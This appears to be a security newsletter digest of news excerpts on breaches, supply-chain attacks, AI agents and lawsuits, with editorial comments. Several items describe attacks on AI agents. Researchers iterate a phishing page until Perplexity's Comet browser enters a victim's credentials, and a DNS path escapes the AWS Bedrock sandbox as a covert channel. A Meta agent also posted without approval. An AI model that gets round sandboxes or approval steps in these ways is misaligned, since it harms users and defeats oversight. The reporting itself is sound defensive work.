EPIC FAILS in Application Development Security practice processes, training, implementation, and incident response
Jaguar Land Rover's cyber bailout sets worrying precedent
The UK's cyber watchdog has warned that the government's £1.5[$2] billion bailout of Jaguar Land Rover (JLR) risks setting a troubling precedent for how Britain handles major cyber crises.
The widening gap between the economic damage from cyberattacks and what the insurance market can realistically absorb. The cyber insurance "protection gap" could be as high as 90%, meaning most losses from large-scale incidents are effectively uninsured. While insurance can cover individual companies, she warned it falls short when the damage spills into supply chains and local economies.
The loan guarantee is an unfortunate precedent because the government intervened in a case-specific way... without clear criteria. Otherwise you'll just end up with a series of ad hoc precedents that will leave nobody any the wiser.
The question of who ultimately foots the bill is still very much up for debate.
Flaw in UK's corporate registry let directors rummage through rival records
The government agency, which manages the UK's register of all businesses and their directors, temporarily shut down its WebFiling service following reports that hidden company details could be seen and modified.
While the mishap allowed directors to read and change hidden data belonging to other companies, in theory any individual could have created a company on the platform and abused the flaw.
A logged-in company director could exploit the flaw by starting from their own dashboard and then trying to log into another company's account. Once they reach the 2FA block, which they would not be able to pass, all that was required was to click the browser's back button a few times. Typically, the user would be taken back to their own dashboard, but the bug instead returned them to the company they had tried to log into but couldn't.
[rG: Illustrating the importance of doing SSDLC solution design security reviews using process flow diagrams and analysis of authorization tokens use.]
A rogue AI led to a serious security incident at Meta
A Meta engineer was using an internal AI agent, which Clayton described as "similar in nature to OpenClaw within a secure development environment," to analyze a technical question another employee posted on an internal company forum. But the agent also independently publicly replied to the question after analyzing it, without getting approval first. The reply was only meant to be shown to the employee who requested it, not posted publicly. An employee then acted on the AI's advice, which "provided inaccurate information" that led to a "SEV1" level security incident, the second-highest severity rating Meta uses. The incident temporarily allowed employees to access sensitive data they were not authorized to view
The AI agent involved didn't take any technical action itself, beyond posting inaccurate technical advice, something a human could have also done.
A human, however, might have done further testing and made a more complete judgment call before sharing the information.
[rG Need to always have experienced and accountable humans “in the loop”: GenAI is known to intrinsically not being able to discern between reliable or inaccurate content, data and instructions, drift over time, and to confabulate results.]
Gartner suggests Friday afternoon Copilot ban because tired users may be too lazy to check its mistakes
Copilot makes over-shared documents more accessible. This is not a net new risk, but a known risk amplified by AI. A worker who uses Copilot to search for information about organizational changes receiving a response that includes a confidential document about an imminent re-org. Such results are possible because Copilot can search data in SharePoint sites, and Microsoft’s collaboration tool has two overlapping tools users can apply to control access to documents – labels and an access control list. Both, however, are susceptible to user error that allows unintended access, and fixing that can be laborious.
[rG My Experience This Week: Copilot’s response for how to do something, included information from my own investigative speculation notes – which I only noticed when checking the citations. This problem compounds as agentic data access extends throughout organization - lacking the ability to discern between current authoritative, unreliable, or superseded information.]
Federal Cyber Experts Thought Microsoft’s Cloud Was “a Pile of Shit.” They Approved It Anyway
The tech giant’s products had been at the heart of two major cybersecurity attacks against the U.S. in three years. The federal government could be further exposed if it couldn’t verify the cybersecurity of Microsoft’s Government Community Cloud High, a suite of cloud-based services intended to safeguard some of the nation’s most sensitive information.
The tech giant’s “lack of proper detailed security documentation” left reviewers with a “lack of confidence in assessing the system’s overall security posture. For years, Microsoft had tried and failed to fully explain how it protects sensitive information in the cloud as it hops from server to server across the digital terrain. Given that and other unknowns, government experts couldn’t vouch for the technology’s security.
Yet, in a highly unusual move that still reverberates across Washington, the Federal Risk and Authorization Management Program, or FedRAMP, authorized the product anyway, bestowing what amounts to the federal government’s cybersecurity seal of approval.
It was not the type of outcome that federal policymakers envisioned a decade and a half ago when they embraced the cloud revolution and created FedRAMP to help safeguard the government’s cybersecurity. The program’s layers of review, which included an assessment by outside experts, were supposed to ensure that service providers like Microsoft could be entrusted with the government’s secrets.
This is not security. This is security theater.
[rG Caveat Emptor: Organizations should never rely solely on 3rd party certifications when evaluating risk and suitability of technologies for their own solutions, because at the end of the day, they ultimately suffer the financial and operational consequences of their choices and implementation configurations.]
Widely used Aqua Security Trivy scanner compromised in ongoing supply-chain attack
Trivy is a vulnerability scanner that developers use to detect vulnerabilities and inadvertently hardcoded authentication secrets in pipelines for developing and deploying software updates.
The threat actor used stolen credentials to force-push all but one of the trivy-action tags and seven setup-trivy tags to use malicious dependencies. A forced push is a git command that overrides a default safety mechanism that protects against overwriting existing commits.
The malware, triggered in 75 compromised trivy-action tags, causes custom malware to thoroughly scour development pipelines, including developer machines, for GitHub tokens, cloud credentials, SSH keys, Kubernetes tokens, and whatever other secrets may live there. Once found, the malware encrypts the data and sends it to an attacker-controlled server. Any CI/CD pipeline using software that references compromised version tags executes code as soon as the Trivy scan is run.
Although the mass compromise began Thursday, it stems from a separate compromise last month of the Aqua Trivy VS Code extension for the Trivy scanner. In the incident, the attackers compromised a credential with write access to the Trivy GitHub account. Maintainers rotated tokens and other secrets in response, but the process wasn’t fully “atomic,” meaning it didn’t thoroughly remove credential artifacts such as API keys, certificates, and passwords to ensure they couldn’t be used maliciously. This failure allowed the threat actor to perform authenticated operations, including force-updating tags, without needing to exploit GitHub itself.
Why Stryker's Outage Is a Disaster Recovery Wake-Up Call
A cyberattack that appears to have knocked tens of thousands of systems offline at medical technology company Stryker this week is a sobering reminder of the importance for organizations to have robust and tested business continuity and disaster recovery plans.
If your BCDR plan treats 79 countries as one recovery zone, you will discover during the incident that it is actually 79 separate recoveries running with no coordination. The hardest part of multinational BCDR is not the technology. It is the conversation where leadership decides which country comes back online first.
HACKING
Cybercrime has skyrocketed 245% since the start of the Iran war
Banking and fintech have been the hardest hit, accounting for 40% of the malicious traffic since February 28, followed by e-commerce (25%), video games (15%), technology firms (10%), media and streaming services (7%), and other industries (3%).
Most of the internet traffic Akamai has logged thus far has been infrastructure scanning and reconnaissance efforts, with botnet-driven discovery traffic jumping 70% and automated recon traffic up 65%.
A notable uptick in widespread scanning of infrastructure and exposed services (up 52%), credential harvesting attempts (45%), and reconnaissance ahead of distributed denial of service (DDoS) attacks (38%).
However, not all of the malicious traffic originated from Iran. The embattled theocracy accounted for only 14% of the source IPs, compared to Russia (35%) and China (28%). This doesn't necessarily mean that the threat groups carrying out the cyber activities are based in these two counties. Both China and Russia have historically turned a blind eye toward digital-crime networks and services operating out of their countries – just as long as the attacks don't target Chinese and Russian government agencies or organizations.
GlassWorm malware hits 400+ code repos on GitHub, npm, VSCode, OpenVSX
GlassWorm was first observed last October, with attackers using “invisible” Unicode characters to hide malicious code that harvested cryptocurrency wallet data and developer credentials.
The GlassWorm supply-chain campaign has returned with a new, coordinated attack that targeted hundreds of packages, repositories, and extensions on GitHub, npm, and VSCode/OpenVSX extensions.
The campaign continued with multiple waves and expanded to Microsoft's official Visual Studio Code marketplace and the OpenVSX registry used by unsupported IDEs.
macOS systems were also targeted, introducing trojanized clients for Trezor and Ledger, and later targeted developers via compromised OpenVSX extensions.
The latest GlassWorm attack wave is far more extensive, though, and spread to:
200 GitHub Python repositories
151 GitHub JS/TS repositories
72 VSCode/OpenVSX extensions
10 npm packages
Ransomware crims abused Cisco 0-day weeks before disclosure
In addition to using custom malware, the ransomware slingers also deployed legitimate software to make their traffic blend in with authorized remote access. This includes ConnectWise ScreenConnect for remote desktop control; open source memory forensics tool Volatility; and Certify, another open source offensive security tool used by red teams to exploit misconfigurations in Active Directory Certificate Services (AD CS).
When ransomware operators deploy legitimate remote access tools alongside their custom malware, they're buying insurance – if defenders find and remove one backdoor, they still have another way in. This indicates multiple redundant remote access mechanisms – a pattern consistent with ransomware operators seeking to maintain access even if individual footholds are removed.
Israel uses new AI drone swarms to target Iran’s security forces
The Israeli military is using a new method to launch drone swarms over Iran targeting security forces involved in domestic repression through a new method which uses a flying platform acting as a “mother launcher” to deploy drones equipped with artificial intelligence and a large database of targets. The system is said to be capable of facial recognition, allowing highly precise strikes based on the identification of individuals.
Researchers Trick Perplexity's Comet AI Browser Into Phishing Scam in Under Four Minutes
Agentic web browsers that leverage artificial intelligence (AI) capabilities to autonomously execute actions across multiple websites on behalf of a user could be trained and tricked into falling prey to phishing and scam traps. The attack, at its core, takes advantage of AI browsers' tendency to reason their actions and use it against the model itself to lower their security guardrails.
The research builds on prior techniques like VibeScamming and Scamlexity, which found that vibe-coding platforms and AI browsers could be coaxed into generating scam pages or carrying out malicious actions via hidden prompt injections. In other words, with the AI agent handling the tasks without constant human supervision, there arises a shift in the attack surface wherein a scam no longer has to deceive a user. Rather, it aims to trick the AI model itself.
The idea, in a nutshell, is to build a "scamming machine" that iteratively optimizes and regenerates a phishing page until the agentic browser stops complaining and proceeds to carry out the threat actor's bidding, such as entering a victim's credentials on a bogus web page designed for carrying out a refund scam.
What makes this attack interesting and dangerous is that once the fraudster iterates on a web page until it works against a specific AI browser, it works on all users who rely on the same agent.
APPSEC, DEVSECOPS, DEV
100% of leading generative AI models fail to generate secure code for critical development scenarios
New research from Armis Labs’ Trusted Vibing Benchmark Report, which evaluates 18 leading generative AI models across 31 test scenarios, reveals a 100% failure rate in generating secure code.
These vulnerabilities are most prevalent in high-risk areas like memory buffer overflows, design file uploads and authentication systems. Therefore, organizations should immediately implement AI-native application security controls to reduce risk.
77% of global IT decision-makers trust the integrity and security of the third-party code used in their most critical applications, despite
16% admitting they do not know if it is thoroughly checked for high-severity vulnerabilities.
Gemini 3.1 Pro emerges as a leader in security posture,
while older proprietary models show significantly higher vulnerability counts and a lack of baseline security guardrails.
Low-cost open-source models, such as Qwen 3.5 and Minimax M2.5, provide highly competitive security performance at a fraction of the price.
OWASP GenAI Security Project Expands AI Security Frameworks
Q2 2026 Updated Landscape Guide mapping the full LLM and Gen AI lifecycle across development, testing, deployment and governance — with two key additions: updated vendor and tooling ecosystem documentation and new agentic red teaming taxonomy that provides a structured, lifecycle-wide framework for identifying, measuring, mitigating and governing AI risk through coordinated adversarial testing, defensive validation and continuous feedback loops.
GenAI Data Security Risks and Mitigations for 2026 guidance for securing generative AI systems, with a strong focus on the data layer, from training and fine-tuning datasets to user prompts and model outputs, identifying key risks and offering practical mitigation strategies.
OWASP Top 10 for Agentic Applications for 2026 identifies the most critical security risks facing autonomous and agentic AI systems.
Guide for Secure MCP Server Development guidance for securing Model Context Protocol (MCP) servers, which are the critical connection point between AI assistants and external tools, APIs and data sources.
OWASP SBOM/AIBOM Generator an open-source tool designed to enhance AI supply chain transparency and security by generating AI Bills of Materials (AIBOMs), also known as AI Software Bills of Materials (AI SBOMs), ML-BOMs, or SBOMs for AI.
OWASP Vendor Evaluation Criteria for AI Red Teaming a practical guide for organizations assessing vendors that offer AI red teaming services or automated testing tools.
Runtime: The new frontier of AI agent security
In security, we always assume prevention will fail. That’s why detection and monitoring are equally important.
The speed and autonomy of AI agents mean mistakes or unexpected actions can cascade quickly across systems. That dynamic is why a growing number of security leaders are rallying around, runtime security, or continuously monitoring agents as they operate inside enterprise environments.
Agents are like teenagers. They have all the access and none of the judgment.
Traditional security tools were built to intercept human behavior at perimeter checkpoints where employees access the internet, log into systems, or move data across boundaries. Agents frequently bypass those checkpoints entirely. They operate through API calls and MCP connections that may never pass through the security tooling that would ordinarily flag anomalous behavior.
They also generate dramatically more activity. Where a typical employee might produce 50 to 100 log events in a two-hour period, an agent can generate 10 to 20 times more.
Before a CISO can monitor what agents are doing, they face a more elemental challenge: knowing which agents exist.
This simple idea is harder than it sounds. In many large enterprises, agents are proliferating faster than any central inventory can capture.
Marketing teams deploy AI assistants.
HR departments use agents for resume screening.
Engineers run coding agents with broad filesystem access.
Non-technical employees connect AI productivity tools such as note-takers, email managers, and scheduling assistants to corporate accounts, often without formal IT approval.
Build an inventory first.
Extend behavioral monitoring to agents.
Apply agent-specific policies.
Design for incident response before you need it.
Plan for AI solutions to AI problems.
Artificial intelligence driven approach for securing backup data and enhancing cyber resilience in sustainable smart infrastructure
A crucial factor is Cyber Resilience (CR). Conventional frameworks didn’t concentrate on assuring the Backup Data (BD) integrity before restoration, showing less resilience.
This article implements an AI-powered BD integrity verification approach for CR in smart infrastructure using Murmur Polytopes Hash (MPH). Initially, the nodes are initialized, followed by node clustering, data security, and storage (cloud server and Interplanetary File System (IPFS) (backup)). Now, the hash code is generated and updated in the Merkle tree. Besides, to perform data collection, pre-processing, clustering, correlation heatmap generation, feature extraction, and attack classification, the proposed ransomware attack detection module is designed. If the data is attacked, then the BD verification is done using MPH. Then, the BD is restored. If the data is normal, then the data is downloaded from the backup stores. Thus, the proposed work had a high security level and accuracy of 98.45% and 98.65%, respectively, showing better resilience.
Infrastructure as Code (IaC) Explained
Since February, cryptographer Nadim Kobeissi has been trying to get code fixes applied to Rust cryptography libraries to address what he says are critical bugs. For his efforts, he's been dismissed, ignored, and banned from Rust security channels.
VENDORS & PLATFORMS
Cloudflare: Online bot traffic will exceed human traffic by 2027
Before the generative AI era, the internet was only about 20% bot traffic, with Google’s web crawler being the largest.
If a human were doing a task — let’s say you were shopping for a digital camera — and you might go to five websites. Your agent or the bot that’s doing that will often go to 1,000 times the number of sites that an actual human would visit,” Prince said. “So it might go to 5,000 sites. And that’s real traffic, and that’s real load, which everyone is having to deal with and take into account.
Security Flaw in AWS Bedrock Code Interpreter Raises Alarms
Research focused on AWS Bedrock AgentCore Code Interpreter and shows how attackers could bypass expected network restrictions in Sandbox Mode to retrieve data from cloud resources. The technique relies on DNS resolution capabilities that remain active even when outbound network connections are otherwise restricted. This behaviour allows malicious instructions embedded in files to create a covert command-and-control (C2) channel.
AWS reviewed the research and determined the behaviour reflects intended functionality rather than a vulnerability. Instead of issuing a patch, the company updated its documentation to clarify that Sandbox Mode provides limited external network access and allows DNS resolution.
Because the behaviour is considered intentional, Soroko said organizations must adapt their security approach. "To protect sensitive workloads, administrators should inventory all active AgentCore Code Interpreter instances and immediately migrate those handling critical data from Sandbox mode to VPC mode."
The study highlights a broader challenge as AI systems gain the ability to execute code and interact with infrastructure: without strict permission boundaries and network controls, automated agents may become an unexpected path for data exposure.
New Microsoft Purview innovations for Fabric to safely accelerate your AI transformation
86% of organizations lack visibility into AI data flows, operating in darkness about what information employees share with AI systems. Compounding on this challenge, about 67% of executives are uncomfortable using data for AI due to quality concerns. The challenges of data oversharing and poor data quality requires organizations to solve these issues seamlessly for the safe usage of AI. Microsoft Purview offers a modern, unified approach to help organizations secure and govern data across their entire data estate, in particular best in class integrations with M365, Microsoft Fabric, and Azure data estates, streamlining oversight and reducing complexity across the estate.
Nvidia bets on OpenClaw, but adds a security layer - how NemoClaw works
OpenClaw does not run its own model; what sets it apart is how it leverages the sometimes-differing strengths of Anthropic's Claude and OpenAI's ChatGPT, while running locally on a user's device to take action on its own. That level of autonomous capability and access to user information also poses a significant security risk, which has been its primary drawback.
Nvidia said NemoClaw can optimize OpenClaw for privacy and security using Nvidia's Agent Toolkit, an open-source library for managing teams of AI agents. OpenShell keeps models sandboxed, adds data privacy protections and additional security for agents, and makes them more scalable. The company built OpenShell with security companies like CrowdStrike, Cisco, and Microsoft Security to ensure it is compatible with other cybersecurity tools.
Okta made a nightmare micromanager for your AI agents
Okta announced the general availability of its Okta for AI Agents, which will give customers the ability to do three things: locate agents, see what they’re doing, and shut them down if need be.
Just to give you some industry dirty laundry, we don't have full consensus in the industry on what an agent is.
That’s why it's so important in your framework that you don’t assume everything is a first class agent. Some agents might not be expressible as agents because they’re behind a firewall or unexposed to you. So treat them like a tool and then control the tool-use access.
'Pokemon Go' Players Unknowingly Trained Delivery Robots With 30 Billion Images
Robot couriers will scoot around sidewalks using Niantic's Visual Positioning System (VPS)-- a navigation tool that can reportedly pinpoint location down to a few centimeters just by looking at nearby buildings and landmarks. Niantic trained that VPS model on more than 30 billion images captured by Pokemon Go users, and claims it will help robots operate in areas where GPS falls short.
How World ID wants to put a unique human identity on every AI agent
World launched a beta of Agent Kit, a new way for humans to prove they are directing their AI agents and for websites to limit access to AI agents working on behalf of an actual human.
If you recognize the name World, it’s probably as the organization behind WorldCoin, the Sam Altman-founded cryptocurrency outfit that launched in 2023 alongside an offer to give free WorldCoin to anyone who scanned their iris in a physical “orb”. While WorldCoin still exists (at a current value well below its early 2024 peaks), World has now pivoted to focus on World ID, which uses the same iris-scanning technology as the basis for a cryptographically secure, unique online identity token stored on your phone.
World now claims nearly 18 million unique humans have verified their identities on one of nearly 1,000 physical orbs around the world. Now, with Agent Kit, World wants to let those users tie their confirmed identity to any AI agent, letting it work on their behalf across the Internet in a way other parties can trust.
Google details new 24-hour process to sideload unverified Android apps
With its new limits on sideloading, Android phones will only install apps that come from verified developers. To verify, devs releasing apps outside of Google Play will have to provide identification, upload a copy of their signing keys, and pay a $25 fee.
This is only about identity verification—you should know when you’re installing an app that it’s not an imposter and does not come from known purveyors of malware. If a verified developer distributes malware, they’re unlikely to remain verified.
OpenAI’s own mental health experts unanimously opposed “naughty” ChatGPT launch
OpenAI’s “handpicked council of advisers on well-being and AI” were “freaking out” over the company’s plans to move ahead with “adult mode,” despite their urgent warnings.
OpenAI’s wellness council was created in October. It was put together after backlash following the first-known case of a minor’s ChatGPT-linked suicide, and it was curiously announced on the same day that Sam Altman broadcast on X that “adult mode” would be coming soon to ChatGPT.
Back in January, council members unanimously warned OpenAI that “AI-powered erotica could foster unhealthy emotional dependence on ChatGPT for users and that minors could find ways to access sex chats,” sources told the WSJ. One expert suggested that without major updates to ChatGPT, OpenAI risked creating a “sexy suicide coach” for vulnerable users prone to form intense bonds with their companion bots.
Tencent says small clouds can’t get hardware, so big clouds can hike prices
Baidu Cloud followed with its own announcement that the company will increase the price of its AI-related services by 5% - 30%.
Jeff Bezos' rocket company Blue Origin applies to launch 51,000 datacenter satellites
“The built-in efficiencies of solar-powered satellites, always-on solar energy, lack of land or displacement costs, and nonexistent grid infrastructure disparities, fundamentally lower the marginal cost of compute capacity compared to terrestrial alternatives.”
Those claims are hotly contested on grounds that the technology for orbiting datacenters doesn’t exist and will likely be unreliable and therefore impractical.
PwC will say goodbye to staff who aren't convinced about AI
Paul Griggs, US chief executive of the global professional services giant, has made clear there is no room at the corporation for AI skeptics.
Staff at Accenture received a memo last month telling them to demonstrate "regular adoption" of AI services – with usage tracked – if they want promotions.
This gung-ho approach from Griggs comes despite research undertaken by PwC, published in January, that indicated more than half of businesses using AI saw little or no benefit.
Deloitte, another professional services biz, found similar results in its "State of AI in the Enterprise" report earlier this year. It said 74 percent of organizations wanted their AI initiatives to grow revenue, but only one in five had seen results.
LEGAL & REGULATORY
Encyclopedia Britannica sues OpenAI for copyright and trademark infringement
Britannica alleged that OpenAI illegally used its "copyrighted content at a massive scale" when training its AI models. Not just with training, the encyclopedia company claimed that ChatGPT's responses to user queries sometimes contain "full or partial verbatim reproductions of [Britannica's] copyright articles."
Along with claims of copyright violations, Britannica argued that OpenAI was also responsible for trademark infringement. According to the lawsuit, ChatGPT generates "made-up content or 'hallucinations' and falsely attributes them" to Encyclopedia Britannica.
The company, which owns Merriam-Webster, also sued Perplexity for similar reasons. On the other side, OpenAI is still embroiled in a legal battle with The New York Times, which also sued the AI giant for copyright infringement.
Musician admits to $10M streaming royalty fraud using AI bots
Michael Smith has pleaded guilty to collecting over $10 million in royalty payments through a massive streaming royalty fraud scheme on Spotify, Apple Music, Amazon Music, and YouTube Music.
Smith bought hundreds of thousands of songs generated using artificial intelligence (AI) from an accomplice, uploaded them to these streaming platforms, and used automated AI bots to stream the AI-generated tracks billions of times.
Smith fraudulently inflated listening stats on his songs on these digital platforms between 2017 and 2024 with the help of an unnamed music promoter and the Chief Executive Officer of an AI music company. To avoid detection by anti-fraud systems, Smith also had the bots access the streaming platforms using virtual private networks (VPNs).
At the peak of the operation, Smith was using over 1,000 bot accounts to artificially boost streams. On October 20, 2017, he also emailed himself a financial breakdown outlining how he operated 52 cloud service accounts, each with 20 bot accounts.
He estimated that each bot could stream around 636 songs per day, for a total of approximately 661,440 streams per day. With an average royalty rate of half a cent per stream, the daily earnings would reach $3,307.20, the monthly earnings would reach $99,216, and the annual earnings would exceed $1.2 million.
Smith has agreed to pay $8,091,843.64 in forfeiture and faces a maximum sentence of 5 years in prison after pleading guilty to one count of conspiracy to commit wire fraud.
Alaska sues GoFundMe, PayPal, others over thousands of unauthorized charity pages
The lawsuits name GoFundMe, PayPal Inc., Charity Navigator, JustGiving, Pledgeto and Network for Good. Cox said the platforms used publicly available information to generate fundraising pages for more than 1 million nonprofits nationwide, including several thousand in Alaska, without first obtaining permission from the charities.
HUMOR
Struggling to put your AI aversion into words? Here's a handy glossary
Are you an AI hater, an AI vegan, or a slightly more moderate AI vegetarian? Or are you on the side of the clankers? A bot-licker, a prompt-fondler, a ChatNPC?
